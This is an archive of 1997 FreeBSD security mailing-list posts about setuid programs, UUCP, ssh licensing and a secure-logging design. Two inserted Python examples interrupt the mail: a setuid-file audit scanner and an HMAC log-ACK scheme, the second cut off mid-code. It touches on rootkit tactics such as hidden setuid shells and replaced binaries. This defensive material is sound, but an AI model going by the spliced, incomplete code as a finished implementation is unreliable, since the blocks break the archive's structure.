Sorry -- I guess I'm old fart hold outs. I use uucp and many of my clients ->| use uucp. From what I see, UUCP use is growing even though these machines ->| never show up in the maps. I think uucp will grow even more. ->| ->| Perhaps the best approach, if you really want to take it out of the ->| standard distribution, is to make it an option at install time. Those that ->| don't know what it is won't install it anyway. 
->|
->| Idiots will blow their feet off no matter how hard you try to protect them.
->| All you will accomplish, if you take it out of the distribution, is
->| force the idiots to use rm * instead and force me to go to MIT to get
->| and install UUCP.
->|
->| -- Jay
->|
->| On Tue, 29 Jul 1997, Adam Shostack wrote:
->|
->| ->Robert Watson wrote:
->| ->| On Mon, 28 Jul 1997, Adam Shostack wrote:
->| ->|
->| ->| > Vincent Poy wrote:
->| ->| >
->| ->| > su really should be setuid. Everything else is debatable. My
->| ->| > advice is to turn off all setuid bits except those you know you need
->| ->| > (possibly w, who, ps, ping, at, passwd)
->| ->
->| ->| Several mail delivery programs (mail.local, sendmail, uucp-stuff, etc)
->| ->| require root access to deliver to local mailboxes; crontab related stuff,
->| ->| terminal locking, some kerberos commands, local XWindows servers, and su
->| ->| all rely on suid.
->| ->
->| ->I know no one who still runs uucp. There are a few holdouts, but most
->| ->systems can leave uucp off with no pain. Ditto with kerberos. :)
->
->--
->"It is seldom that liberty of any kind is lost all at once."
-> -Hume
->
->

From owner-freebsd-security Tue Jul 29 20:17:42 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id UAA03030 for security-outgoing; Tue, 29 Jul 1997 20:17:42 -0700 (PDT) Received: from tok.qiv.com ([204.214.141.211]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id UAA03021 for ; Tue, 29 Jul 1997 20:17:38 -0700 (PDT) Received: (from uucp@localhost) by tok.qiv.com (8.8.6/8.8.5) with UUCP id WAA08348; Tue, 29 Jul 1997 22:15:26 -0500 (CDT) Received: from localhost (jdn@localhost) by acp.qiv.com (8.8.6/8.8.5) with SMTP id WAA00890; Tue, 29 Jul 1997 22:11:20 -0500 (CDT) X-Authentication-Warning: acp.qiv.com: jdn owned process doing -bs Date: Tue, 29 Jul 1997 22:11:19 -0500 (CDT)
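Adam's advice quoted repeatedly above (turn off every setuid bit you cannot account for, keep su and the handful of others you know you need) is the kind of check that has to be repeated after a compromise, since a rootkit's first move is often to leave a setuid shell somewhere obscure. The following is an added example and not code from this thread: it is the Python equivalent of `find / \( -perm -4000 -o -perm -2000 \) -type f -ls`, followed by a comparison against an allow-list, reporting both the privileged files nobody approved and the approved programs that have lost their bit. The allow-list and the constructed directory layout (including the hidden setuid "sh" under /tmp/.x) are assumptions for the demo.

```python
import os
import shutil
import stat
import tempfile

# Hypothetical allow-list of setuid/setgid programs this host is expected to carry.
# The entries are an assumption for the example; build the real one from the installed
# system and from what the admin knows is needed (the thread names su, w, who, ps,
# ping, at and passwd, plus mail delivery, crontab and a few others).
ALLOWLIST = {"/usr/bin/su", "/usr/bin/passwd", "/usr/bin/w", "/usr/bin/who",
             "/bin/ps", "/sbin/ping", "/usr/bin/at"}


def scan_privileged(root: str) -> dict:
    """Walk root (treated as '/') without following symlinks; return {path: mode} for
    every regular file with the setuid or setgid bit set."""
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; a real audit would log this
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                rel = "/" + os.path.relpath(path, root).replace(os.sep, "/")
                found[rel] = stat.S_IMODE(st.st_mode)
    return found


def audit(found: dict, allowlist: set) -> dict:
    """Three lists: privileged files nobody approved; approved programs that no longer
    carry the bit (a replaced binary often loses it); and the chmod lines for the first."""
    unexpected = sorted(p for p in found if p not in allowlist)
    missing = sorted(p for p in allowlist if p not in found)
    fixes = ["chmod u-s,g-s %s" % p for p in unexpected]
    return {"unexpected": unexpected, "missing": missing, "fixes": fixes}


def demo() -> dict:
    """Constructed tree: two approved setuid programs, one approved program without its
    bit, and a setuid shell hidden under a dot directory in /tmp."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    try:
        layout = {"usr/bin/su": 0o4755, "usr/bin/passwd": 0o4755,
                  "usr/bin/w": 0o555, "tmp/.x/sh": 0o4755}
        for rel, mode in layout.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as f:
                f.write(b"#!/bin/sh\n")  # stand-in contents
            os.chmod(path, mode)
        return audit(scan_privileged(root), ALLOWLIST)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for key, items in demo().items():
        print(key, items)
```

The "missing" list is as useful as the "unexpected" one: an approved program that has lost its setuid bit was probably overwritten, which is exactly the netstat/telnetd replacement Vince describes, and points at the file to restore from clean media. Mail delivery, crontab, terminal locking and the UUCP programs Robert lists would go on the allow-list only if the host actually uses them.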
From: "Jay D. Nelson" To: Michael Smith cc: adam@homeport.org, robert+freebsd@cyrus.watson.org, vince@mail.MCESTATE.COM, security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: <199707300154.LAA16359@genesis.atrad.adelaide.edu.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

Your choir is singing to my preacher. I've got no problem making UUCP optional. I would install it, though it would be totally overlooked by most newcomers. Which is probably a good thing.

I've had a few clients that wanted to do the SMTP thing on demand. Thankfully, after explaining what is involved, I haven't had to do that yet.

-- Jay

On Wed, 30 Jul 1997, Michael Smith wrote:

->Jay D. Nelson stands accused of saying:
->> Sorry -- I guess I'm one of the old fart holdouts. I use uucp and many of my clients
->> use uucp. From what I see, UUCP use is growing even though these machines
->> never show up in the maps. I think uucp will grow even more.
->
->The ISP I feed from is making a lot of money selling UUCP email
->services to small and medium-sized businesses, often in conjunction
->with web hosting services. UUCP has a great deal more flexibility
->than using dialup POP or push-SMTP, and it's a winner in the
->"security" argument too.
->
->> Perhaps the best approach, if you really want to take it out of the
->> standard distribution, is to make it an option at install time. Those that
->> don't know what it is won't install it anyway.
->
->This is likely to happen with the next generation of installation
->software.
->
->--
->]] Mike Smith, Software Engineer msmith@gsoft.com.au [[
->]] Genesis Software genesis@gsoft.com.au [[
->]] High-speed data acquisition and (GSM mobile) 0411-222-496 [[
->]] realtime instrument control. (ph) +61-8-8267-3493 [[
->]] Unix hardware collector. "Where are your PEZ?"
The Tick [[ -> From owner-freebsd-security Tue Jul 29 20:27:42 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id UAA03433 for security-outgoing; Tue, 29 Jul 1997 20:27:42 -0700 (PDT) Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id UAA03424 for ; Tue, 29 Jul 1997 20:27:36 -0700 (PDT) Received: (from msmith@localhost) by genesis.atrad.adelaide.edu.au (8.8.5/8.7.3) id MAA17737; Wed, 30 Jul 1997 12:55:47 +0930 (CST) 
From: Michael Smith Message-Id: <199707300325.MAA17737@genesis.atrad.adelaide.edu.au> Subject: Re: security hole in FreeBSD In-Reply-To: from "Jay D. Nelson" at "Jul 29, 97 10:11:19 pm" To: jdn@qiv.com (Jay D. Nelson) Date: Wed, 30 Jul 1997 12:55:47 +0930 (CST) Cc: msmith@atrad.adelaide.edu.au, adam@homeport.org, robert+freebsd@cyrus.watson.org, vince@mail.MCESTATE.COM, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL28 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Jay D. Nelson stands accused of saying: > Your choir is singing to my preacher. I've got no problem making UUCP > optional. I would install it, though it would be totally overlooked by > most new comers. Which is probably a good thing. Agree. > I've had a few clients that wanted to do the SMTP thing on demand. > Thankfully, after explaining what is involved, I haven't had to to that > yet. Newer sendmails make it _moderately_ painless. I do quite a lot of work for another ISP that uses it very heavily (I think they have about a thousand dialup push-SMTP customers), but IMHO it's a lot more work to set up, and the running cost for the customer is higher in low load cases. > -- Jay -- ]] Mike Smith, Software Engineer msmith@gsoft.com.au [[ ]] Genesis Software genesis@gsoft.com.au [[ ]] High-speed data acquisition and (GSM mobile) 0411-222-496 [[ ]] realtime instrument control. (ph) +61-8-8267-3493 [[ ]] Unix hardware collector. "Where are your PEZ?" 
The Tick [[ From owner-freebsd-security Tue Jul 29 20:32:37 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id UAA03805 for security-outgoing; Tue, 29 Jul 1997 20:32:37 -0700 (PDT) Received: from fly.HiWAAY.net (root@fly.HiWAAY.net [208.147.154.56]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id UAA03797 for ; Tue, 29 Jul 1997 20:32:34 -0700 (PDT) Received: from nexgen.hiwaay.net by fly.HiWAAY.net; (8.8.6/1.1.8.2/21Sep95-1003PM) id WAA31800; Tue, 29 Jul 1997 22:31:41 -0500 (CDT) Received: from nexgen (localhost [127.0.0.1]) by nexgen.hiwaay.net (8.8.6/8.8.4) with ESMTP id WAA09906 for ; Tue, 29 Jul 1997 22:01:58 -0500 (CDT) Message-Id: <199707300301.WAA09906@nexgen.hiwaay.net> X-Mailer: exmh version 2.0zeta 7/24/97 To: freebsd-security@FreeBSD.ORG 
From: dkelly@hiwaay.net Subject: Commercial ssh and ssl (was Re: securelevel...) In-reply-to: Message from Vincent Poy of "Tue, 29 Jul 1997 16:00:38 PDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 29 Jul 1997 22:01:58 -0500 Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

Vincent Poy wrote:
>
> On Wed, 30 Jul 1997 sthaug@nethelp.no wrote:
>
> =)[cc list trimmed]
> =)
> =)> I was considering installing ssh but there is only one problem.
> =)> I use Win95 from my own side at times for various reasons as well as
> =)> the other remote admins. So a ssh client does cost money. We're
> =)> volunteers and are not getting paid in any shape or form.
> =)
> =)The ssh client for Windows is $99. Educational sites are eligible for a
> =)50% discount. Or you could run the FreeBSD version - for free.
>
> We're not an Educational site and are not getting paid by GaiaNet.
> We voluntarily help admin the machines remotely. I know the FreeBSD
> version is free but I am not always accessing the machines from the same
> physical location.

Is the FreeBSD ssh really free? From /usr/ports/security/ssh/Makefile:

# Don't use IDEA. IDEA can be freely used for non-commercial use. However,
# commercial use may require a licence in a number of countries and

@echo You must set variable USA_RESIDENT to YES if you are a USA
@echo resident or NO otherwise.
@echo If you are a USA resident you have to get the RSAREF2
@echo library \(RSA Inc. holds a patent on RSA and public key
@echo cypto in general - using RSA implementations other thann
@echo RSAREF will violate the US patent law\)
@echo and extract it to ${WRKSRC}.

Would someone care to correct me if I'm wrong, but don't the above terms prevent GaiaNet (who presumably charges for services) from using ssh at all without purchasing a license for RSA and/or IDEA?
Looked into using ssh and SSLeay (in Apache) at work and concluded that if I'm being paid, it's commercial, and licenses are required. And it's even more commercial if my employer is being paid by a customer (US Gov) to implement. Same for the TIS-FWTK. Am I applying a stricter interpretation of the non-commercial terms than appropriate?

It's a shame really, because if the choice boils down to Apache-SSL for $995 on FreeBSD vs. Netscape at $1295 on BSDI, SGI, or Solaris, Netscape will win. If it was up to The Boss, a Netscape or Microsoft server on NT would be the only consideration.

I forgot, when does the relevant RSA patent expire? Maybe we can wait until then. :-)

--
David Kelly N4HHE, dkelly@hiwaay.net
=====================================================================
The human mind ordinarily operates at only ten percent of its capacity -- the rest is overhead for the operating system.

From owner-freebsd-security Wed Jul 30 05:09:57 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id FAA26858 for security-outgoing; Wed, 30 Jul 1997 05:09:57 -0700 (PDT) Received: from logic.it (mod16.logic.it [195.120.151.32]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id FAA26851 for ; Wed, 30 Jul 1997 05:09:47 -0700 (PDT) Received: (qmail 534 invoked by uid 1000); 30 Jul 1997 12:04:33 -0000 Date: Wed, 30 Jul 1997 14:04:33 +0200 (MET DST)
From: Marco Molteni X-Sender: molter@dumbwinter.ecomotor.it To: Vincent Poy cc: security@FreeBSD.ORG, "\[Mario1-\]" Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

Ok guys, my 2 cents opinion ;-)

There's a thing I really can't understand in all this thread. Nobody said: "Vince, we're sorry about what happened to you. Probably you did something stupid, but _everybody_ has to learn his lesson the hard way. Here you are a checklist of books, programs and ideas to follow to improve the security of your site."

No, everybody started to flame at him! Why? Because he chose as his subject line: "security hole in FreeBSD" instead of "I'm a sucker please you security wizards help me"?

Do you think one can be a newcomer as an administrator, but _has_ to know everything about security before he starts to work? Come on!

Now a note about myself. I'm not a security expert, but security is surely a field I like much. I'm subscribed to this list to learn. In the previous examples I'm not suggesting that Vince is a sucker or similar, I'm just replying to some arguments that appeared in the postings.

Marco Molteni
Computer Science student at the Universita' di Milano, Italy.
"The time has come", the Walrus said, "to talk of many things".
From owner-freebsd-security Wed Jul 30 05:30:35 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id FAA27664 for security-outgoing; Wed, 30 Jul 1997 05:30:35 -0700 (PDT) Received: from anugpo.anu.edu.au (anugpo.anu.edu.au [150.203.2.6]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id FAA27659 for ; Wed, 30 Jul 1997 05:30:31 -0700 (PDT) Received: from bohm.anu.edu.au (root@bohm.anu.edu.au [150.203.21.88]) by anugpo.anu.edu.au (8.8.5/8.8.5) with SMTP id WAA07750; Wed, 30 Jul 1997 22:30:27 +1000 (EST) Received: from s3080696 by bohm.anu.edu.au (SMI-8.6/SMI-SVR4) id WAA23230; Wed, 30 Jul 1997 22:30:12 +1000 Message-Id: <3.0.32.19970730223202.0070ef8c@student.anu.edu.au> X-Sender: s3080696@student.anu.edu.au X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Wed, 30 Jul 1997 22:32:18 +1000 To: Adam Shostack , jdn@qiv.com (Jay D. Nelson) 
From: James Seng Subject: Re: security hole in FreeBSD Cc: adam@homeport.org, robert+freebsd@cyrus.watson.org, vince@mail.MCESTATE.COM, security@FreeBSD.ORG Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

At 09:06 PM 7/29/97 -0400, Adam Shostack wrote:
> Let me be clear; I don't have anything against UUCP users, but
>most people don't need it turned on. Since parts of it are
>setuid, (and thus potential security holes) I think it's reasonable
>to suggest that it ship either not setuid or as an install option.

I have not heard of any request for the use of UUCP from my users, nor have my UUCP binaries been used in the last few years... I think the time when leased lines were expensive, when universities worked with 9,600bps (wow) connections and when UUCP ruled the earth is over... we have to let it go and look forward. *8)

I have nothing against UUCP of course, but it is always nice if we can reduce the base distribution size by leaving some of the less often used stuff out.

*cheers*
-James Seng

From owner-freebsd-security Wed Jul 30 06:04:10 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id GAA29009 for security-outgoing; Wed, 30 Jul 1997 06:04:10 -0700 (PDT) Received: from sinbin.demos.su (sinbin.demos.su [194.87.0.31]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id GAA29003 for ; Wed, 30 Jul 1997 06:04:02 -0700 (PDT) Received: by sinbin.demos.su id QAA13164; (8.6.12/D) Wed, 30 Jul 1997 16:59:22 +0400
From: bag@sinbin.demos.su (Alex G. Bulushev) Message-Id: <199707301259.QAA13164@sinbin.demos.su> Subject: Re: security hole in FreeBSD In-Reply-To: <3.0.32.19970730223202.0070ef8c@student.anu.edu.au> from "James Seng" at "Jul 30, 97 10:32:18 pm" X-ELM-OSV: (Our standard violations) no-mime=1; no-hdr-encoding=1 To: jseng@pobox.org.sg (James Seng) Date: Wed, 30 Jul 1997 16:59:22 +0400 (MSD) Cc: adam@homeport.org, jdn@qiv.com, robert+freebsd@cyrus.watson.org, vince@mail.MCESTATE.COM, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL32 (25)] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

> At 09:06 PM 7/29/97 -0400, Adam Shostack wrote:
> > Let me be clear; I don't have anything against UUCP users, but
> >most people don't need it turned on. Since parts of it are
> >setuid, (and thus potential security holes) I think it's reasonable
> >to suggest that it ship either not setuid or as an install option.
>
> I have not heard of any request for the use of UUCP from my users, nor have my
> UUCP binaries been used in the last few years... I think the time when leased
> lines were expensive, when universities worked with 9,600bps (wow) connections and
> when UUCP ruled the earth is over... we have to let it go and look forward. *8)
>
> I have nothing against UUCP of course, but it is always nice if we can reduce
> the base distribution size by leaving some of the less often used stuff out.

This is not right: uucp is very popular in the ex-SU, more than 30% of users read mail via uucp, and this is not due to 9600 :) Some users run uucp over ip ... a big number of fbsd pc's work as uucp hosts, sometimes without ip connections ...

Alex.
> > *cheers*
> > -James Seng
>

From owner-freebsd-security Wed Jul 30 06:46:03 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id GAA01269 for security-outgoing; Wed, 30 Jul 1997 06:46:03 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id GAA01264 for ; Wed, 30 Jul 1997 06:46:00 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id GAA13867; Wed, 30 Jul 1997 06:45:49 -0700 (PDT) Date: Wed, 30 Jul 1997 06:45:49 -0700 (PDT)
From: Vincent Poy To: Marco Molteni cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

On Wed, 30 Jul 1997, Marco Molteni wrote:

=)Ok guys,
=)my 2 cents opinion ;-)

I'll add my 2 cents too since I've been awake for 72 hours anyways.

=)There's a thing I really can't understand in all this thread.
=)Nobody said:
=)"Vince, we're sorry about what happened to you. Probably you did something
=)stupid, but _everybody_ has to learn his lesson the hard way.
=)Here you are a checklist of books, programs and ideas to follow to
=)improve the security of your site."

That much I'll agree with since you won't know pain until it hits you.

=)No, everybody started to flame at him! Why? Because he chose as his
=)subject line: "security hole in FreeBSD" instead of "I'm a sucker
=)please you security wizards help me"?
=)
=)Do you think one can be a newcomer as an administrator, but _has_ to know
=)everything about security before he starts to work? Come on!
=)
=)Now a note about myself. I'm not a security expert, but security is
=)surely a field I like much. I'm subscribed to this list to learn.
=)In the previous examples I'm not suggesting that Vince is a sucker or
=)similar, I'm just replying to some arguments that appeared in the postings.

I know. I mean Nate and Jordan have been in this thing for at least twice as long as I have. I'm only 23 years old now. Jordan, Nate and the rest of the FreeBSD core team have been designing Unix from the start from what Jordan told me back in the FreeBSD 1.0 Gamma days. One will never know everything and will need to learn from others. Unless everyone is Albert Einstein here.
Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____
Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ]
GaiaNet Corporation - M & C Estate / / / / | / | __] ]
Beverly Hills, California USA 90210 / / / / / |/ / | __] ]
HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____]

From owner-freebsd-security Wed Jul 30 06:52:50 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id GAA01716 for security-outgoing; Wed, 30 Jul 1997 06:52:50 -0700 (PDT) Received: from shift-f1.com (shift-f1.com [205.160.29.37]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id GAA01705 for ; Wed, 30 Jul 1997 06:52:46 -0700 (PDT) Received: (from shashi@localhost) by shift-f1.com (8.8.5/8.8.5) id JAA25877; Wed, 30 Jul 1997 09:50:56 -0500 (EST)
From: Shashi Joshi Message-Id: <199707301450.JAA25877@shift-f1.com> Subject: So, lets have a checklist compiled (was Re: Security hole) In-Reply-To: from Marco Molteni at "Jul 30, 97 02:04:33 pm" To: molter@logic.it (Marco Molteni) Date: Wed, 30 Jul 1997 09:50:56 -0500 (EST) Cc: vince@mail.MCESTATE.COM, security@FreeBSD.ORG, mario1@PrimeNet.Com X-Mailer: ELM [version 2.4ME+ PL31 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

As Marco Molteni said ->
> There's a thing I really can't understand in all this thread.
> Nobody said:
> "Vince, we're sorry about what happened to you. Probably you did something
> stupid, but _everybody_ has to learn his lesson the hard way.
> Here you are a checklist of books, programs and ideas to follow to
> improve the security of your site."
>
> No, everybody started to flame at him! Why? Because he chose as his
> subject line: "security hole in FreeBSD" instead of "I'm a sucker
> please you security wizards help me"?
>
> Do you think one can be a newcomer as an administrator, but _has_ to know
> everything about security before he starts to work? Come on!

Exactly my thoughts. So, do we get a checklist or reference list from the gurus?

I am also a bit new to the sys admin duties. I have taken the time to read the FreeBSD book that came with the CD (which doesn't help much in the security area), read a UNIX sysadmin book (Nemeth, Snyder etc the Red Book) but it too has its limitations.

We don't have external user logins, so the risks are much less, but I would always like to learn because soon we will be "out there".

Another netter mentioned that FreeBSD should ship with some documentation, scripts that tell us (about the system files and directories) what are the files associated with "feature" A or "service" B (e.g. uucp), which files need to be setuid for what functionality.

Here is an example.
(I know you gurus will laugh, but it was my 3rd day only.)

Realizing that sbin dirs are for sysadmin-related files, I made the */sbin as -r-xr-x--- with the group being wheel or bin as appropriate. Now, after a few weeks!! I realised that I am not able to send out any mail. I had been receiving mail like anything; my elm session also didn't complain when I sent out email. Finally I checked the logs and found nothing, not a trace of a mail sent out. So I checked `which sendmail` and it was /usr/sbin/sendmail. So I had to give r-x permissions on it to the world.

Now why would sendmail be in sbin when it is not purely a sysadmin tool?

My point? Having a document or a checklist would be real helpful to newbies and can serve as a quick reference for the gurus.

regards,
--
Shashi Joshi

From owner-freebsd-security Wed Jul 30 07:04:32 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id HAA02572 for security-outgoing; Wed, 30 Jul 1997 07:04:32 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id HAA02559 for ; Wed, 30 Jul 1997 07:04:28 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id KAA08273; Wed, 30 Jul 1997 10:04:15 -0400 (EDT) Date: Wed, 30 Jul 1997 10:04:14 -0400 (EDT)
From: Robert Watson Reply-To: Robert Watson To: Adam Shostack cc: security@FreeBSD.ORG, rgrimes@GndRsh.aac.dev.com, dholland@eecs.harvard.edu Subject: Re: secure logging (was: Re: security hole in FreeBSD) In-Reply-To: <199707300111.VAA16730@homeport.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

On Tue, 29 Jul 1997, Adam Shostack wrote:

> Robert Watson wrote:
> | Is there any consensus on the use of DNSsec in the network community, as
> | it has not yet been made widely available (or at least, it is available,
> | but not largely used.) The key namespace here could be used however one
> | desired, not necessarily in a DNS-style way. The entity-name, whatever
> | that is, simply suggests which key/algorithm should be used, a server
> | could be configured to pull that information from DNSsec, or from an
> | internal key-file (or both.)
>
> I don't trust the DNS right now. I also don't see a need to
> put keys there for local use. Use ssh to distribute them. :)

DNSsec requires one root key to authenticate against any outside key located in DNSsec. SSH requires a complete list of all keys in a manually-managed keyfile. SSH is wonderful, and I use it lots, but it really isn't scalable. DNSsec is designed to be globally scalable. I wouldn't be surprised if SSH starts using DNSsec to pick up and store SSH keys in the near future. :)

Also, to use secure logging (hopefully a feature that will be available on all platforms eventually), I don't want to require the configuration and use of SSH. Right now SSH is more available than DNSsec, but if the Internet infrastructure is to get any more secure, we really need DNSsec in place very, very soon. Manual keying is never desirable (except for the root key, or an organizational root key), although it should be supported.
My hopes were to support a general keying architecture, hopefully with a key management daemon eventually being written by someone. Key names would be supported in a DNS-like form, and permit .local. or such to indicate a local key, which would be extracted from a local key-file, possibly distributed with SSH. I'd rather not design the key support to not use DNSsec. :)

> | An ACK message has already been stated as desirable -- would a simple
> | signature over the last packet (or header + signature) using the shared
> | secret, entity public key, or whatever, back on the TCP connection
> | suffice? Maybe something lighter-weight?
>
> I'm leaning to acks being simpler than involving the last
> packet, and towards them involving just a sequence number:
>
> ACK log://somehost.evil.net:234566, HMAC

Sequence numbers have their upsides and downsides. One downside is that I will easily generate a million log messages a week (some use syslog for HTTP logging) -- if I have 100 machines doing that, a 32 bit number has restrictions. The URL format only accepts 16-bit values in that field, I think, although I don't know if that's an artifact of port limits, and can be any numeric value. Sequence numbers on individual log messages might be nice, as then one can eliminate duplicates in a cleanup operation, as well as detect missing log entries.

ACK's should definitely be signed in some way, possibly over:

Signature of packet responded to | ACK packet sans signature

BTW, is there any interest in starting up a separate mailing list on this issue? It doesn't pertain specifically to FreeBSD, although I plan to do any experimentation and implementing on this platform, myself.
Robert N Watson
Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/
Network Security Research, Trusted Information Systems http://www.tis.com/
Network Administrator, SafePort Network Services http://www.safeport.com/
robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/

From owner-freebsd-security Wed Jul 30 07:07:13 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id HAA02814 for security-outgoing; Wed, 30 Jul 1997 07:07:13 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id HAA02809 for ; Wed, 30 Jul 1997 07:07:10 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id KAA08284; Wed, 30 Jul 1997 10:06:57 -0400 (EDT) Date: Wed, 30 Jul 1997 10:06:57 -0400 (EDT)
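Added illustration of the secure-logging exchange Robert Watson sketches in the message above: each log record carries a sequence number and is authenticated, the collector uses the sequence numbers to spot duplicates and gaps, and every ACK is signed over the signature of the record it answers plus the ACK body. This is example code written for this archive, not code from the thread, from FreeBSD or from any syslog implementation; the wire format, the choice of HMAC-SHA256 with a pre-shared key (the thread also contemplates public keys fetched via DNSsec, which would replace the HMAC with a signature), the 64-bit sequence field and the constructed key are all assumptions.

```python
"""Signed log records with sequence numbers and bound ACKs (added example)."""
import hashlib
import hmac

# Constructed demo key; a real deployment would provision one per sending host.
SHARED_KEY = b"constructed-demo-key-not-for-production"

SEQ_BYTES = 8     # 64-bit sequence field (assumption; sidesteps the 32-bit limit raised above)
TAG_BYTES = 32    # HMAC-SHA256 output length


def _mac(key, *parts):
    """HMAC over length-prefixed parts, so part boundaries are unambiguous."""
    h = hmac.new(key, digestmod=hashlib.sha256)
    for part in parts:
        h.update(len(part).to_bytes(4, "big"))
        h.update(part)
    return h.digest()


def make_record(key, seq, payload):
    """Wire format (assumed): seq | payload | HMAC(key, seq | payload)."""
    body = seq.to_bytes(SEQ_BYTES, "big") + payload
    return body + _mac(key, body)


class Receiver:
    """Collector side: verify, de-duplicate, track gaps, answer with a bound ACK."""

    def __init__(self, key):
        self.key = key
        self.seen = set()
        self.next_expected = 0
        self.missing = set()
        self.accepted = []

    def handle(self, record):
        """Return (status, ack). status is 'ok', 'dup' or 'bad'; ack is None for 'bad'."""
        if len(record) < SEQ_BYTES + TAG_BYTES:
            return "bad", None
        body, tag = record[:-TAG_BYTES], record[-TAG_BYTES:]
        if not hmac.compare_digest(tag, _mac(self.key, body)):
            return "bad", None              # forged or corrupted: never logged, never ACKed
        seq = int.from_bytes(body[:SEQ_BYTES], "big")
        if seq in self.seen:
            status = "dup"                  # retransmit or replay: ACK again, do not log twice
        else:
            self.seen.add(seq)
            if seq > self.next_expected:    # a hole appears: records lost or still in flight
                self.missing.update(range(self.next_expected, seq))
            self.missing.discard(seq)
            self.next_expected = max(self.next_expected, seq + 1)
            self.accepted.append((seq, body[SEQ_BYTES:]))
            status = "ok"
        # The ACK is signed over the signature of the record it answers plus its own
        # body: the "Signature of packet responded to | ACK packet sans signature" form.
        ack_body = b"ACK" + seq.to_bytes(SEQ_BYTES, "big")
        return status, ack_body + _mac(self.key, tag, ack_body)


def verify_ack(key, record, ack):
    """Sender side: accept an ACK only if it is bound to this exact record."""
    if len(ack) != 3 + SEQ_BYTES + TAG_BYTES or ack[:3] != b"ACK":
        return False
    ack_body, ack_tag = ack[:-TAG_BYTES], ack[-TAG_BYTES:]
    if ack_body[3:] != record[:SEQ_BYTES]:
        return False                        # ACK for a different sequence number
    return hmac.compare_digest(ack_tag, _mac(key, record[-TAG_BYTES:], ack_body))


def demo():
    """Constructed exchange: seq 1 is lost, seq 0 is replayed, one record is tampered with."""
    rx = Receiver(SHARED_KEY)
    recs = [make_record(SHARED_KEY, i, b"constructed log line %d" % i) for i in range(3)]
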